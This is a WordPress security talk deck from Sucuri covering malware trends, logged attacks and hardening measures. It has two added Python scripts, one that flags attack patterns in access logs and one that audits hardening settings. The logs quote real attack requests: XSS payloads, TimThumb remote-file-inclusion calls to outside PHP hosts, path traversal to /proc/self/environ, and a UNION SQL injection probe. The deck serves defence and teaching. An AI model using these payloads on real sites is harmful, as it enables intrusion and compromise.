WordPress Website Security

Specialization:
  - Website Security
  - Incident Handling
  - Log Analysis
Special Interests:
  - Warfare
  - Weapons
  - Martial Arts

Tony Perez | @perezbox | @sucuri_security | 5/1/2013

- Website Security Company
- Global Operations
- All Website Platforms
- Scan 1M Unique Domains a Month
- Block 1M web attacks a Month
- 300 – 500 websites a day
- Signature / Heuristic Based
- 24/5 - 18/2 operations

- Trends
- Threats
- Defenses

SIMPLE RIGHT?

Chart: Malicious Links, 2011 vs 2012

Chart: Known Malware vs Unknown Malware

Chart: Not Infected vs Infected

Chart: malware distribution by type. Categories: Remote iFrame Includes, Remote JavaScript Includes, SPAM Injections, Obfuscated / Encoded JavaScript, Conditional Redirects, Defacements, Other. Values as extracted: 26%, 19%, 16%, 14%, 11%, 4%, 10%.

Diagram: the server (Apache, SSH, Email)
- Going deeper than the application layer, targeting the server.
- Server Polymorphism – a.k.a. changes a lot

- Stick With Reputable Sources
  - Gravity Forms
  - JetPack Forms
  - Generating SPAM emails, resource hogs
  - IP blacklisting
  - Leverage Captchas

- Pharmacy
- Payday Loans

- Access – so easy, yet so weak

Diagram: four sites (Site 1 to Site 4) on mixed WordPress versions: 2.8, 3.5.1, 3.4.2, 3.0

- W3TC & WP Super Cache
  - Remote Command Execution (RCE) Vulnerability
- WPMM
  - SPAM Injections (Bad Plugin)
- Social Media Widget
  - SPAM Injections (Core Commit)

- Explosion in the Malware as a Service (MaaS) trade
  - Yes, pay someone to hack for you
- Different tools to break in and generate payloads
  - Brute force and vulnerability exploits
Malware Payloads
- Blackhole Exploit Kit – Today’s market leader
  - 2013 – SophosLabs

What kind of website do you have?
- Use for malware?
- Burrow into network?
- Steal data?

38.123.140.6 - - [18/Feb/2013:18:23:23 -0500] "GET /cgi-bin/viewcvs.cgi/?cvsroot=<script>foo</script> HTTP/1.1" 302 227 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
123.151.39.41 - - [18/Mar/2013:16:20:12 -0400] "GET /art/all/animals/%3C%2Fscript%3E%3Cimg+src%3D%40+onerror%3Dalert%287872%29+%2F%3E HTTP/1.1" 404 268
- Stored
- Reflective

[02/Apr/2013:00:32:58 -0400] "GET /results/wp-content/themes/Convertible/timthumb.php?src=http%3A%2F%2Fflickr.easyneffective.com%2Fcrotz.php HTTP/1.1" 200 11983 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
83.170.99.221 - - [03/Apr/2013:13:03:16 -0400] "GET /results/chinchedbistro.com&sa=U&ei=vGBcUYS1IcOaiQLxu4HIBg&ved=0CCYQFjAE&usg=AFQjCNFN1APEnX9-WPS337kMyPUz0yDM8A/wp-content/themes/vulcan/lib/scripts/thumb.php?src=http://wordpress.com.4creatus.com/info.php HTTP/1.1" 200 11983 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
82.98.131.101 - - [03/Apr/2013:12:59:56 -0400] "GET /?option=com_ckforms&controller=../../../../../../../../../../../../../../../../../../../../../../../..//proc/self/environ%0000 HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"

62.122.71.181 - - [03/Apr/2013:05:24:22 -0400] "GET //?malware-999.9+union+select+0-- HTTP/1.1" 200 26336 "-" "Mozilla/5.0 (Windows NT;en-us) Firefox/3.5.9"
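Detection logic for the request patterns in the log excerpts above (reflected XSS, TimThumb-style remote file inclusion, directory traversal with a null byte, UNION-based SQL injection), added here as an example that is not part of the original deck. The parser, rule names and `triage()` helper are this example's own, and it runs over constructed log lines with placeholder addresses modelled on the slide's excerpts.

```python
"""Triage Apache access-log lines for the request patterns shown on the slides:
reflected XSS probes, TimThumb-style remote file inclusion, directory traversal
with a null byte, and UNION-based SQL injection.  The sample lines below are
constructed (placeholder IPs and domains), modelled on the slide's excerpts."""
import re
from urllib.parse import unquote_plus

# Apache "combined" format.  Referrer and user-agent are optional because one
# of the slide's lines ends right after the status code and response size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)(?: (?P<proto>[^"]+))?" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
    r'(?: "(?P<referrer>[^"]*)" "(?P<ua>[^"]*)")?'
)

# Rules are applied to the percent-decoded request path (and to the raw path,
# so an encoded null byte is caught either way).  They are kept narrow so that
# ordinary image and search requests do not fire.
RULES = [
    ("xss",  re.compile(r'<\s*/?\s*script|<\s*img[^>]*\bonerror\s*=', re.I)),
    ("rfi",  re.compile(r'(?:timthumb|thumb)\.php\?[^ ]*\bsrc=https?://', re.I)),
    ("lfi",  re.compile(r'(?:\.\./){3,}|/proc/self/environ|%00|\x00', re.I)),
    ("sqli", re.compile(r'\bunion\b\s+(?:all\s+)?select\b', re.I)),
]


def parse_line(line):
    """Return the log fields as a dict, or None if the line is not combined format."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def classify(path):
    """Return the names of the rules that match a request path."""
    # Decode twice: double-encoded payloads are common and decoding a plain
    # string a second time is harmless.
    decoded = unquote_plus(unquote_plus(path))
    return [name for name, rx in RULES if rx.search(decoded) or rx.search(path)]


def triage(lines):
    """Return (ip, status, path, tags) for every parsable line that hits a rule."""
    hits = []
    for line in lines:
        fields = parse_line(line)
        if fields is None:
            continue
        tags = classify(fields["path"])
        if tags:
            hits.append((fields["ip"], int(fields["status"]), fields["path"], tags))
    return hits


# Constructed sample lines (RFC 5737 test addresses, example.net hosts).
SAMPLE_LINES = [
    # reflected XSS probes, as on the "Stored / Reflective" slide
    '203.0.113.10 - - [18/Feb/2013:18:23:23 -0500] "GET /cgi-bin/viewcvs.cgi/?cvsroot=<script>foo</script> HTTP/1.1" 302 227 "-" "Mozilla/4.0 (compatible; MSIE 8.0)"',
    '203.0.113.11 - - [18/Mar/2013:16:20:12 -0400] "GET /art/all/animals/%3C%2Fscript%3E%3Cimg+src%3D%40+onerror%3Dalert%287872%29+%2F%3E HTTP/1.1" 404 268',
    # TimThumb remote file inclusion: src= points at an off-site .php
    '203.0.113.12 - - [02/Apr/2013:00:32:58 -0400] "GET /wp-content/themes/demo/timthumb.php?src=http%3A%2F%2Fflickr.example.net%2Fx.php HTTP/1.1" 200 11983 "-" "Mozilla/5.0"',
    # directory traversal to /proc/self/environ with a trailing null byte
    '203.0.113.13 - - [03/Apr/2013:12:59:56 -0400] "GET /?option=com_ckforms&controller=../../../../../../../..//proc/self/environ%0000 HTTP/1.1" 302 - "-" "Mozilla/5.0"',
    # UNION-based SQL injection probe
    '203.0.113.14 - - [03/Apr/2013:05:24:22 -0400] "GET //?malware-999.9+union+select+0-- HTTP/1.1" 200 26336 "-" "Mozilla/5.0"',
    # ordinary request: must not fire
    '203.0.113.15 - - [03/Apr/2013:05:25:00 -0400] "GET /wp-content/uploads/2013/04/photo.jpg HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, status, path, tags in triage(SAMPLE_LINES):
        print(f"{ip} {status} {','.join(tags):5} {path[:70]}")
```

A 200 response to an RFI or SQLi probe (as in the slide's TimThumb and UNION lines) deserves a closer look than a 404, so the status code is kept in every hit.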

- Brand Reputation
- Legal Implications
- Impact to Sales
- Blacklisted by Search Engines
- Blacklisted by Payment processors
- Worst Day Of your Life

- Access Control
- Vulnerabilities
- Hosting
- Online Habits
- Social Media
- Passwords

“It’s about risk reduction… risk will never be zero…”

- We run on WordPress
  - Current Version of course
- Sucuri properties suffer:
  - ~125,000 web based attacks a month on average
  - ~4,000 attacks a day
    ▪ This spikes on occasion
  - Doesn’t include server level attacks
  - All flavors of attacks

- Instead of telling you what you need to do, I’ll just tell you what we do.
- Our philosophy and approach is very simple: complex things break in complex ways.
- We focus on the areas that we can immediately control.
- We believe in layered defenses.

- Stay Current
- IP Whitelisting
- Two Factor Authentication
- Strong / Unique Password
- Web Application Firewall

- IP Whitelisting
- Server Isolation
- Public Key Authentication
- Host Intrusion Detection System (HIDS)
- Log Everything

Category | Tool | Type
Prevention – Software Vulnerabilities | Sucuri CloudProxy | Service
Prevention – Access Control | Sucuri CloudProxy | Service
Detection | Sucuri Monitoring | Service
Remediation | Sucuri | Service
Password Management | 1Password / LastPass | Application
Host-based Intrusion Detection System | OSSEC | Application
Access Control Enforcement | Login Secure Solutions | Plugin
Two-Factor Authentication | Google Authenticator | Plugin
Application Auditing | Sucuri Premium | Plugin
Backups | BackupBuddy | Plugin

Category | Location | Type
Disable Theme / Plugin Editor | wp-config.php | Preventive measure
Disable PHP execution | .htaccess – uploads / images / wp-includes / etc. | Preventive measure
Permissions | Directories 755 / Files 644 | Preventive measure
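The three preventive measures in the table above as an audit-and-fix script, added here as an example that is not part of the original deck or of any Sucuri tool. The function names and the temporary WordPress-like tree it checks are this example's own; the .htaccess rule is the widely used Apache 2.2 form, and Apache 2.4 uses "Require all denied" in the same block.

```python
"""Audit and apply the three hardening measures from the slide's table:
DISALLOW_FILE_EDIT in wp-config.php, a .htaccess that blocks PHP execution
under uploads and wp-includes, and 755/644 permissions.  The WordPress tree
is a constructed temp-directory fixture; the helper names are this example's own."""
import os
import re
import stat
import tempfile

# Directories that must never execute PHP dropped into them.
NO_EXEC_DIRS = ["wp-content/uploads", "wp-includes"]

# Apache 2.2 syntax; on Apache 2.4 the same <Files> block uses
# "Require all denied" instead, which the audit regex also accepts.
DENY_PHP_HTACCESS = "<Files *.php>\ndeny from all\n</Files>\n"

EDIT_RE = re.compile(r"""define\(\s*['"]DISALLOW_FILE_EDIT['"]\s*,\s*true\s*\)""", re.I)
DENY_RE = re.compile(
    r"<Files\s+\*?\.php>.*?(?:deny\s+from\s+all|Require\s+all\s+denied).*?</Files>",
    re.I | re.S)


def _read(path):
    """Return a file's text, or "" when it does not exist."""
    if not os.path.exists(path):
        return ""
    with open(path) as fh:
        return fh.read()


def _walk_modes(root):
    """Yield (path, is_dir, permission bits) for everything below root."""
    for dirpath, dirnames, filenames in os.walk(root):
        for name, is_dir in [(d, True) for d in dirnames] + [(f, False) for f in filenames]:
            p = os.path.join(dirpath, name)
            yield p, is_dir, stat.S_IMODE(os.stat(p).st_mode)


def audit(root):
    """Return human-readable findings; an empty list means all three measures hold."""
    findings = []
    if not EDIT_RE.search(_read(os.path.join(root, "wp-config.php"))):
        findings.append("wp-config.php: DISALLOW_FILE_EDIT is not set to true")
    for rel in NO_EXEC_DIRS:
        if not DENY_RE.search(_read(os.path.join(root, rel, ".htaccess"))):
            findings.append(f"{rel}: no .htaccess rule blocking PHP execution")
    for p, is_dir, mode in _walk_modes(root):
        want = 0o755 if is_dir else 0o644
        if mode != want:
            kind = "directory" if is_dir else "file"
            findings.append(f"{os.path.relpath(p, root)}: {kind} mode {mode:o}, expected {want:o}")
    return findings


def harden(root):
    """Apply the three measures in place; return the number of changes made."""
    changes = 0
    cfg = os.path.join(root, "wp-config.php")
    text = _read(cfg) or "<?php\n"
    if not EDIT_RE.search(text):
        # The constant must be defined before wp-settings.php is loaded, so
        # insert it ahead of the "stop editing" marker when one is present.
        line, marker = "define('DISALLOW_FILE_EDIT', true);\n", "/* That's all, stop editing!"
        text = text.replace(marker, line + marker, 1) if marker in text else text + line
        with open(cfg, "w") as fh:
            fh.write(text)
        changes += 1
    for rel in NO_EXEC_DIRS:
        ht = os.path.join(root, rel, ".htaccess")
        if not DENY_RE.search(_read(ht)):
            os.makedirs(os.path.dirname(ht), exist_ok=True)
            with open(ht, "a") as fh:
                fh.write(DENY_PHP_HTACCESS)
            changes += 1
    for p, is_dir, mode in _walk_modes(root):
        want = 0o755 if is_dir else 0o644
        if mode != want:
            os.chmod(p, want)
            changes += 1
    return changes


def make_fixture():
    """Build a constructed, deliberately weak WordPress-like tree; return its root."""
    root = tempfile.mkdtemp(prefix="wp-audit-")
    for rel in ["wp-content/uploads/2013/04", "wp-includes", "wp-content/themes/demo"]:
        os.makedirs(os.path.join(root, rel))
    with open(os.path.join(root, "wp-config.php"), "w") as fh:
        fh.write("<?php\ndefine('DB_NAME', 'demo');\n/* That's all, stop editing! Happy blogging. */\n")
    with open(os.path.join(root, "wp-content/uploads/2013/04/photo.jpg"), "w") as fh:
        fh.write("not really a jpeg")
    os.chmod(os.path.join(root, "wp-content/uploads"), 0o777)  # world-writable directory
    os.chmod(os.path.join(root, "wp-config.php"), 0o666)       # world-writable config
    return root


if __name__ == "__main__":
    root = make_fixture()
    print("before:", *audit(root), sep="\n  ")
    print("changes:", harden(root))
    print("after:", audit(root))
```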

- Don’t know what you’re doing?
- Go with a managed host…

Doesn’t mean you won’t ever get infected.

Complex . Long . Unique . Esoteric
“CLUE”

USERNAMES
652,911 [log] => admin
10,173 [log] => test
8,992 [log] => administrator
8,921 [log] => Admin
2,495 [log] => root
PASSWORDS
16,798 [pwd] => admin
10,880 [pwd] => 123456
9,727 [pwd] => 666666
9,106 [pwd] => 111111
7,882 [pwd] => 12345678
7,717 [pwd] => qwerty
7,295 [pwd] => 1234567
Epic Fail

- Access
  - Login Secure Solution
  - Stealth Login
  - Limit Login
- Scanning
  - WordFence
  - Anti-Malwatch
- Defense in Depth
  - BetterWP Security
  - BulletProof Security
- Vulnerabilities
  - MVIS Security Center

Name | Tool
Sucuri Blog | http://blog.sucuri.net
SucuriTV | http://sucuri.tv
WordPress Forum – Hacked | http://wordpress.org/tags/hacked
WordPress Forum – Malware | http://wordpress.org/tags/malware
Badware Busters | https://badwarebusters.org
Perishable Press | http://perishablepress.com/category/web-design/security/
Google Forums | http://productforums.google.com/forum/#!categories/webmasters/malware--hacked-sites
WordPress.org Hardening | http://codex.wordpress.org/Hardening_WordPress
Google Webmaster Tools | http://support.google.com/webmasters/bin/answer.py?hl=en&answer=163633
Secunia Security Advisories | http://secunia.com/community/advisories/search/?search=wordpress
Exploit-DB | http://www.exploit-db.com/search/?action=search&filter_description=Wordpress&filter_platform=31
